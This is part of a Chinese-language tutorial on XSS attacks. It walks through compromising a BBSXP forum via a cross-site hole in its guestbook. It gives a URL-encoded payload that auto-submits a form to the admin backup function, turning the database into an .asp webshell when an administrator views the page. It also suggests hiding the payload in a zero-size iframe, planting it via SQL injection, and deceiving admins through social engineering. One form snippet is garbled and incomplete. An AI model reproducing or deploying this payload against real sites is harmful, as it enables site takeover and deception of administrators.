详解XSS跨站脚本攻击（3）

三、来自外部的跨站攻击

有的时候，当我们对于目标程序找不到可以利用的跨站点，这个时候我们可以利用可以从外部入手，利用我们要拿下的是它的论谈，论谈的安全性做的很好，但其留言板却存在跨站漏洞，这个时候我们可以在留言板里写入跨站语句，跨站语句为以表单的方式向论谈提交提升权限的语句，如上面的bbsxp加asp 扩展的语句。当然我们可利用后台的备份功能直接得到一个shell。

例：先上传一个文件linzi.txt，内容如下：

action=“http://127.0.0.1/bbsxp/admin_fso.asp？menu=bakbf” method=“post”》

上面的代码是把论谈的数据库备份为shit.asp，留言板存在跨站点如下：

http://127.0.0.1/bbsxp/page2.asp？username=

我们构造备份跨站语句如下：

以下为引用的内容：
http://127.0.0.1/bbsxp/page2.asp？ username=％3C％62％6F％64％79％20％6F％6E％6C％6F％61％64％3D％22％6A％61％76％61％73％63％72％69％70％74％3A％64％6F％63％75％6D％65％6E％74％2E％66％6F％72％6D％73％5B％30％5D％2E％73％75％62％6D％69％74％28％29％22％3E％3C％66％6F％72％6D％20％61％63％74％69％6F％6E％3D％22％68％74％74％70％3A％2F％2F％31％32％37％2E％30％2E％30％2E％31％2F％62％62％73％78％70％2F％61％64％6D％69％6E％5F％66％73％6F％2E％61％73％70％3F％6D％65％6E％75％3D％62％61％6B％62％66％22％20％6D％65％74％68％6F％64％3D％22％70％6F％73％74％22％3E％3C％69％6E％70％75％74％20％76％61％6C％75％65％3D％22％64％61％74％61％62％61％73％65％2F％62％62％73％78％70％2E％6D％64％62％22％20％6E％61％6D％65％3D％22％79％6C％22％20％3E％3C％69％6E％70％75％74％20％76％61％6C％75％65％3D％22％64％61％74％61％62％61％73％65％2F％73％68％69％74％2E％61％73％70％22％20％6E％61％6D％65％3D％22％62％66％22％20％3E％3C％2F％62％6F％64％79％3E％3C％2F％68％74％6D％6C％3E

或者构造跨站语句，利用iframe打开一个0大小的linzi.txt。

当管理员打开后，会自动备份得到一个shell.

四、XSS与其它技术的结何

从上面的实例，我们可以知道，如何欺骗管理打开是一个很重要的步骤，对于欺骗打开，除了社会工程学外，我们可以结合其它的技术，如sql injection.当我们渗透一个网站之时，主站mssql注入漏洞，权限为public，这个时候我们利用update构造跨站语句，如用iframe打开一个上面的备份得到shell的跨站语句等，同样，我们可以在社会工程学时，利用QQ的其它跨站漏洞等等。

总是对于欺骗也是一门艺术，具体怎么利用，大家就发挥自己的想象力吧！